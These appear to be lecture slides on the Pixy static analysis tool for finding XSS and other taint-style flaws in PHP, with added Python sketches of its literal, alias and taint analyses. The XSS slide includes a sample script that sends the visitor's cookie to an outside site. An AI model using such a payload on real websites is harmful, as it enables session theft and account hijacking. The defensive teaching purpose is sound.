Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities. Nenad Jovanovic, Christopher Kruegel, Engin Kirda. Secure Systems Lab, Vienna University of Technology. Proceedings of the IEEE Symposium on Security and Privacy (May 2006).
Outline • Introduction • Taint-Style Vulnerabilities • Data Flow Analysis • Empirical Results • Conclusions • Comments
Introduction(1/2) • There is an urgent need for automated vulnerability detection in Web application development. • Existing approaches for mitigating threats to Web applications can be divided into client-side and server-side solutions • Server-side solutions: • Static approaches • Scan source code for vulnerabilities • Dynamic approaches • Detect vulnerabilities while executing the audited program
Introduction(2/2) • Pixy • The first open source tool for statically detecting XSS vulnerabilities in PHP4 code by means of data flow analysis • It can be applied to other taint-style vulnerabilities such as SQL injection or command injection • http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Taint-Style Vulnerabilities(1/2) • Of all vulnerabilities in Web applications, problems caused by unchecked input are recognized as the most common • Attackers inject malicious data into Web applications • Attackers manipulate applications using malicious data • The authors refer to this class of vulnerabilities as the tainted object propagation problem • Term taken from “Finding security errors in Java programs with static analysis,” in Proceedings of the 14th Usenix Security Symposium, Aug. 2005
Taint-Style Vulnerabilities(2/2) • Tainted data • Originates from potentially malicious users • Causes security problems at vulnerable points in the program (called sensitive sinks) • May enter the program at specific places, and can spread via assignment and similar constructs • Can be untainted (sanitized) using a set of operations • Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. • They differ only with respect to the concrete values of a few parameters
Cross-Site Scripting (XSS)(1/2) • Occurs when dynamically generated Web pages display improperly validated input • An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites in order to: • hijack the user's account credentials • change user settings • steal cookies • insert unwanted content into the page
Cross-Site Scripting (XSS)(2/2) • Reflected Cross-Site Scripting Attacks • Stored Cross-Site Scripting Attacks • An attacker's malicious script is rendered more than once • Examples: <script>alert('Hello World');</script> <a href="/usercp.php?action=logout">A web page about rabbits</a> <script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>
Properties of XSS • Entry Points into the program • GET: $_GET • POST: $_POST • COOKIE: $_COOKIE • The set of entry points grows when “register_globals” is active • Sanitization Routines • htmlentities(), htmlspecialchars(), and type casts • Sensitive Sinks • echo() • print() • printf()…
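Since taint-style vulnerabilities differ only in a few parameters, the XSS instance on this slide can be written down as plain data. The following is a minimal sketch in Python; the `TaintSpec` class, the `XSS_SPEC` constant and the `classify` helper are illustrative names assumed here, not part of Pixy, and only the entries named on the slide are included.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TaintSpec:
    """Hypothetical container for the parameters of one vulnerability class."""
    entry_points: frozenset
    sanitizers: frozenset
    sinks: frozenset


# Values copied from the slide; type casts are omitted because they are
# language constructs rather than named functions.
XSS_SPEC = TaintSpec(
    entry_points=frozenset({"$_GET", "$_POST", "$_COOKIE"}),
    sanitizers=frozenset({"htmlentities", "htmlspecialchars"}),
    sinks=frozenset({"echo", "print", "printf"}),
)


def classify(name, spec):
    """Return the role that `name` plays under the given specification."""
    if name in spec.entry_points:
        return "entry point"
    if name in spec.sanitizers:
        return "sanitizer"
    if name in spec.sinks:
        return "sensitive sink"
    return "other"
```

Under this representation, another taint-style vulnerability such as SQL injection would presumably be a second `TaintSpec` value with different sinks and sanitizers, while the analysis itself stays the same.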
Data Flow Analysis(1/4) • Goal: To determine whether tainted data can reach sensitive sinks without being properly sanitized. • Identify the taint value of variables used in these sinks • Statically compute certain information for every single program point (or for coarser units such as functions) • PHP Front-End • Constructs a parse tree for the PHP input file • The parse tree is transformed into a linearized form resembling three-address code (TAC), and kept as a control flow graph for each encountered function • Assembly-like language • At most 3 operands • “x = y op z”
Data Flow Analysis(2/4) • Operates on the control flow graph (CFG) of a program • A data structure built on top of the intermediate code representation that abstracts the control flow behavior of a function being compiled • Node – atomic statement of the program • Edge – flow of control
Literal Analysis: Basics • Purpose: To determine, for each program point, the literal that a variable or a constant can hold. • Can improve the precision of the overall analysis by: • Evaluating branch conditions • Ignoring program paths that cannot be executed at runtime (called path pruning) • Resolving non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses) • After performing literal analysis • each CFG node is associated with information about which literal is mapped to a variable before executing that node
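To make the “x = y op z” form concrete, the sketch below linearizes a nested expression into three-address code in Python. The tuple-based expression format, the `_t1`, `_t2` temporary names and the `linearize` function are assumptions made for illustration; Pixy's actual front-end works on a PHP parse tree and is not reproduced here.

```python
import itertools


def linearize(target, expr):
    """Flatten `target = expr` into three-address instructions.

    `expr` is either an operand name (str) or a tuple (op, left, right).
    Each instruction is a tuple (result, operand1, op, operand2); a plain
    copy uses None for the operator and second operand.
    """
    temps = itertools.count(1)
    code = []

    def visit(node):
        if isinstance(node, str):
            return node  # operands need no instruction of their own
        op, left, right = node
        left_name = visit(left)
        right_name = visit(right)
        temp = f"_t{next(temps)}"  # fresh temporary for this subexpression
        code.append((temp, left_name, op, right_name))
        return temp

    result = visit(expr)
    code.append((target, result, None, None))
    return code


# $x = $a + $b * $c
tac = linearize("$x", ("+", "$a", ("*", "$b", "$c")))
```

Each emitted instruction has at most three operands, which is what keeps the later transfer functions simple: every CFG node touches only a handful of variables.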
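Path pruning can be illustrated with a very small sketch in Python. It assumes a literal mapping from variable names to known literals, with a missing or Ω entry meaning "unknown", and it handles only conditions of the hypothetical form `if (var == literal)` using Python equality instead of PHP's loose comparison rules. The function name `feasible_branches` is invented for this example.

```python
OMEGA = "Ω"  # the unknown literal


def feasible_branches(state, var, literal):
    """Branches of `if (var == literal)` that may execute at runtime.

    `state` maps variable names to the literal they are known to hold
    before the branch; unknown variables are treated as Ω.
    """
    known = state.get(var, OMEGA)
    if known == OMEGA:
        return {"then", "else"}  # cannot decide: keep both paths
    return {"then"} if known == literal else {"else"}
```

When only one branch is feasible, the other path is ignored by the subsequent analyses, which removes warnings that could only arise on paths the program never takes.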
How Data Flow Analysis is Used to Perform Literal Analysis • Assume a fictitious programming language • One variable (v) • Two literals (the integers 3 and 4) • “skip” node • empty instruction • “Ω” • Unknown literal
Data Flow Analysis(3/4) • Carrier Lattice • Information about the program is represented using values from an algebraic structure • Every piece of information that could ever be associated with a CFG node by the analysis must be contained as an element of the lattice used • Bottom element: “not visited yet” at the beginning • Line: ordering between elements with regard to precision • Least upper bound: the smallest element that is greater than or equal to both of the elements. Needed by the analysis algorithm
Data Flow Analysis(4/4) • Transfer Function • f: P → P for each node in the control flow graph • Input: a lattice element • Output: a lattice element • Models the effect of the node on the program information • Each CFG node is associated with such a transfer function
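For the fictitious language with one variable and the literals 3 and 4, the carrier lattice has four elements: bottom, 3, 4 and Ω. A minimal Python sketch of its least upper bound follows; the string encodings of bottom and Ω are assumptions chosen for readability.

```python
BOTTOM = "bottom"  # "not visited yet"
OMEGA = "Ω"        # unknown literal, the top element


def lub(a, b):
    """Least upper bound of two elements of the lattice {bottom, 3, 4, Ω}."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    if a == b:
        return a
    return OMEGA  # two different literals, or Ω itself, give Ω
```

The interesting case is `lub(3, 4)`: when two paths disagree about the literal, the only safe statement about the variable is that its value is unknown.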
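Lattice, CFG and transfer functions come together in an iterative fixpoint computation. The Python sketch below uses a generic worklist algorithm on the one-variable toy language; it is a textbook formulation, not Pixy's implementation, and the node names, the dictionary-based CFG encoding and the choice of Ω as the value at the entry node are all assumptions.

```python
BOTTOM, OMEGA = "bottom", "Ω"


def lub(a, b):
    """Least upper bound on the lattice {bottom, 3, 4, Ω}."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    return a if a == b else OMEGA


def analyze(nodes, edges, entry, transfer):
    """Compute, for every node, the lattice element valid before it.

    edges:    dict node -> list of successor nodes
    transfer: dict node -> function from lattice element to lattice element
    """
    before = {node: BOTTOM for node in nodes}
    before[entry] = OMEGA  # assumption: nothing is known about v on entry
    worklist = [entry]
    while worklist:
        node = worklist.pop()
        after = transfer[node](before[node])
        for successor in edges.get(node, []):
            merged = lub(before[successor], after)
            if merged != before[successor]:
                before[successor] = merged
                worklist.append(successor)  # information changed: revisit
    return before


def skip(value):
    return value  # empty instruction leaves the information unchanged


def assign(literal):
    return lambda value: literal  # v = literal overwrites the old value


# if (...) { v = 3 } else { v = 4 }, followed by a join point
nodes = ["start", "then", "else", "join"]
edges = {"start": ["then", "else"], "then": ["join"], "else": ["join"]}
result = analyze(nodes, edges, "start",
                 {"start": skip, "then": assign(3),
                  "else": assign(4), "join": skip})
same = analyze(nodes, edges, "start",
               {"start": skip, "then": assign(3),
                "else": assign(3), "join": skip})
```

In `result`, the join node is mapped to Ω because the two branches disagree; in `same`, both branches assign 3, so the literal survives the merge.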
Literal Analysis: Basics • Carrier Lattice Definition • Provides mappings for all variables and constants that appear in the scanned program • Able to describe the mapping to any possible literal (infinite)
Literal Analysis: Basics • Transfer Function Definition • PHP has no explicit type declarations, so a variable may be a “hidden” array
Four cases in order of increasing complexity 1. Not an array element and not known as array • strong update 2. An array, but not an array element • Array tree 3. An array element without non-literal indices (may be an array) • strong overlap
Four cases in order of increasing complexity 4. An array element with non-literal indices and maybe an array • weak overlap algorithm: all overwrite operations are replaced by least upper bound operations • Array elements with one or more non-literal indices are permanently mapped to Ω
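The difference between overwriting and taking the least upper bound can be shown on a flat literal mapping. This Python sketch is a deliberate simplification: it ignores the array tree and treats array elements as independent keys, and the function names `strong_update` and `weak_update` are assumed for illustration.

```python
OMEGA = "Ω"  # unknown literal


def lub(a, b):
    """Least upper bound of two literals (no bottom element needed here)."""
    return a if a == b else OMEGA


def strong_update(state, var, literal):
    """The assignment definitely hits `var`: overwrite its literal."""
    new_state = dict(state)
    new_state[var] = literal
    return new_state


def weak_update(state, candidates, literal):
    """The assignment may hit any of `candidates`: merge instead of overwrite."""
    new_state = dict(state)
    for var in candidates:
        new_state[var] = lub(new_state.get(var, OMEGA), literal)
    return new_state


state = {"$a[1]": 7, "$a[2]": 5}
# $a[1] = 9;  the index is a literal, so the target is known exactly
strong = strong_update(state, "$a[1]", 9)
# $a[$i] = 7; the index is unknown, so every element of $a may be hit
weak = weak_update(state, ["$a[1]", "$a[2]"], 7)
```

After the weak update, `$a[1]` keeps the literal 7 because old and new value agree, while `$a[2]` becomes Ω because it holds either 5 or 7.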
Alias Analysis • Ignoring alias relationships would prevent literal analysis from producing correct results in a number of cases. • Without alias analysis, literal analysis cannot tell that an assignment to $a also affects $b, so the literal recorded for $b would remain unchanged and be incorrect.
Carrier Lattice Definition • Alias group: a group of variables referencing the same memory location • Alias information is modeled through sets of alias group sets • (…): an alias group • {…}: an alias group set • Must-aliases of a variable • “{(a,b) (c)}” $b: must-alias of $a • May-aliases of a variable • “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a • The order among lattice elements is defined as subset inclusion
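The two examples on this slide can be checked mechanically. The Python sketch below represents an alias group as a tuple and an alias group set as a list of tuples, mirroring the (…) and {…} notation; this encoding and the three helper functions are assumptions for illustration. A must-alias is taken to be a variable that shares a group with the given variable in every alias group set, and a may-alias one that does so in some but not all of them.

```python
def group_of(var, group_set):
    """The alias group containing `var`; a lone variable is its own group."""
    for group in group_set:
        if var in group:
            return set(group)
    return {var}


def must_aliases(var, group_sets):
    """Variables aliased with `var` in every alias group set."""
    groups = [group_of(var, group_set) for group_set in group_sets]
    common = set.intersection(*groups) if groups else set()
    return common - {var}


def may_aliases(var, group_sets):
    """Variables aliased with `var` in some, but not all, alias group sets."""
    groups = [group_of(var, group_set) for group_set in group_sets]
    anywhere = set.union(*groups) if groups else set()
    return anywhere - must_aliases(var, group_sets) - {var}


one_set = [[("a", "b"), ("c",)]]                          # {(a,b) (c)}
two_sets = [[("a", "b"), ("c",)], [("a", "c"), ("b",)]]   # {(a,b) (c)} {(a,c) (b)}
```

With `one_set`, `$b` is reported as a must-alias of `$a`; with `two_sets`, `$b` and `$c` are both may-aliases of `$a` and there are no must-aliases, matching the slide.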
Static analysis is not able to decide which path the program will take • Under the assumption that the condition is determined by dynamic factors • Environment variables, user input
Transfer Function Definition • Reference assignment • “$a = & $b” • Unset node • The unset variable gets its own one-element alias group in each alias group set • Global node • Treated like a reference assignment with the equally named variable from the global scope on the right side • “global $a;” • The authors only consider references to simple variables
Literal Analysis Revisited • Here we only consider references to simple variables • Functions built into PHP are conservatively modeled as returning Ω since the increased precision is expected to be rather small • The only built-in function modeled precisely is “define”
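The effect of a reference assignment and of an unset node on a single alias group set can be sketched as follows in Python. Alias groups are frozensets here, the function names are invented for this example, and the handling of a right-hand variable that does not yet appear in any group is an assumption; in the full analysis the same operation would be applied to every alias group set in the lattice element.

```python
def detach(group_set, var):
    """Remove `var` from its group, dropping the group if it becomes empty."""
    remaining = {group - {var} for group in group_set}
    return {group for group in remaining if group}


def unset(group_set, var):
    """unset($var): the variable gets its own one-element alias group."""
    return frozenset(detach(group_set, var) | {frozenset({var})})


def reference_assign(group_set, target, source):
    """$target = &$source: target leaves its old group and joins source's."""
    if target == source:
        return frozenset(group_set)
    result = set()
    for group in detach(group_set, target):
        result.add(group | {target} if source in group else group)
    if not any(source in group for group in result):
        # Assumption: a source variable not seen before forms a new group.
        result.add(frozenset({source, target}))
    return frozenset(result)


start = frozenset({frozenset({"a"}), frozenset({"b"}), frozenset({"c"})})
after_ab = reference_assign(start, "a", "b")     # $a = &$b
after_ac = reference_assign(after_ab, "a", "c")  # $a = &$c
```

Starting from {(a) (b) (c)}, the first assignment yields {(a,b) (c)} and the second yields {(b) (a,c)}; unsetting `$a` in either state restores three singleton groups.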
Literal Analysis Revisited • The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value • On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.
Taint Analysis • Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant. • Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities
Taint Analysis • Carrier Lattice Definition • Tainted: a variable is tainted if it can hold a malicious, not yet sanitized (checked) value originating from user input • Variables are mapped not to literals or Ω but to the taint values tainted and untainted • Mapped to tainted: this variable might be tainted. • Mapped to untainted: this variable is untainted. • Whenever the analysis cannot determine the taint value, the variable is conservatively assumed to be tainted
Taint Analysis • Transfer Functions Definition • Casting a tainted variable to an integer untaints this variable • (implicitly with unary operators such as + and -, or with an (int) cast) • Correctly modeling built-in PHP functions can reduce the number of false positives • Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax • “htmlentities” and “array” return $_UNTAINTED
Taint Analysis • Using the Analysis Results • Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward. • The analysis information for each sensitive sink is searched for tainted input variables • A warning message indicating the corresponding line is issued if such a violation is discovered
Limitations • Pixy does not support object-oriented features of PHP. • These constructs are treated optimistically: it is assumed that malicious data can never arise from them. • Files included with “include” and similar keywords are not scanned automatically • The authors frequently observed false positives stemming from these missing file inclusions • Eliminated through manual inclusion
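The taint lattice is smaller than the literal lattice, and merging two program paths becomes simple: a variable is tainted after the merge if it is tainted on either path. The Python sketch below assumes a two-element lattice without a bottom element and treats variables missing from a path's state as tainted, following the conservative rule on this slide; the names `taint_lub` and `merge_states` are illustrative.

```python
TAINTED, UNTAINTED = "tainted", "untainted"


def taint_lub(a, b):
    """Least upper bound of two taint values: tainted dominates."""
    return TAINTED if TAINTED in (a, b) else UNTAINTED


def merge_states(first, second):
    """Merge the variable-to-taint mappings of two incoming paths."""
    merged = {}
    for var in set(first) | set(second):
        # A variable unknown on one path is conservatively tainted there.
        merged[var] = taint_lub(first.get(var, TAINTED),
                                second.get(var, TAINTED))
    return merged
```

The asymmetry is intentional: reporting a harmless value as tainted costs a false positive, whereas reporting a malicious value as untainted would miss a vulnerability.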
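The warning step can be sketched end to end for straight-line code. The Python example below is a toy, not Pixy: it has no branches, functions or aliases, the statement tuples are a hypothetical format, unknown functions are assumed to pass their argument's taint through, and the entry points, sanitizers and sinks are the ones named earlier in these slides.

```python
TAINTED, UNTAINTED = "tainted", "untainted"
ENTRY_POINTS = {"$_GET", "$_POST", "$_COOKIE"}
SANITIZERS = {"htmlentities", "htmlspecialchars"}
SINKS = {"echo", "print", "printf"}


def taint_of(operand, state):
    """Taint value of an operand; anything unknown counts as tainted."""
    base = operand.split("[", 1)[0]  # $_GET['name'] -> $_GET
    if base in ENTRY_POINTS:
        return TAINTED
    return state.get(operand, TAINTED)


def scan(statements):
    """Return warnings for tainted values that reach a sensitive sink.

    Hypothetical statement formats:
      (line, "assign", target, source)
      (line, "call", target, function, argument)
      (line, "sink", function, argument)
    """
    state, warnings = {}, []
    for statement in statements:
        line, kind = statement[0], statement[1]
        if kind == "assign":
            _, _, target, source = statement
            state[target] = taint_of(source, state)
        elif kind == "call":
            _, _, target, function, argument = statement
            if function in SANITIZERS:
                state[target] = UNTAINTED
            else:
                # Assumption: unmodeled functions propagate taint unchanged.
                state[target] = taint_of(argument, state)
        elif kind == "sink":
            _, _, function, argument = statement
            if function in SINKS and taint_of(argument, state) == TAINTED:
                warnings.append(
                    f"line {line}: tainted value {argument} reaches {function}")
    return warnings


program = [
    (1, "assign", "$name", "$_GET['name']"),        # $name = $_GET['name'];
    (2, "sink", "echo", "$name"),                   # echo $name;
    (3, "call", "$safe", "htmlentities", "$name"),  # $safe = htmlentities($name);
    (4, "sink", "echo", "$safe"),                   # echo $safe;
]
warnings = scan(program)
```

Only the `echo` on line 2 is reported; the sanitized value printed on line 4 is considered safe.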
Conclusions • A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities • Additional literal analysis and alias analysis to improve correctness and precision of taint analysis • Pixy, an open-source Java tool that implements these analysis techniques • Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate
Comments • The first to perform alias analysis for an untyped, reference-based scripting language such as PHP • Beyond the scope of the paper • Recursive calls depend on dynamic information • Infinite call depth for non-terminating programs • The implementation is widely used by the public. • Future work • automatic inclusion of “include” files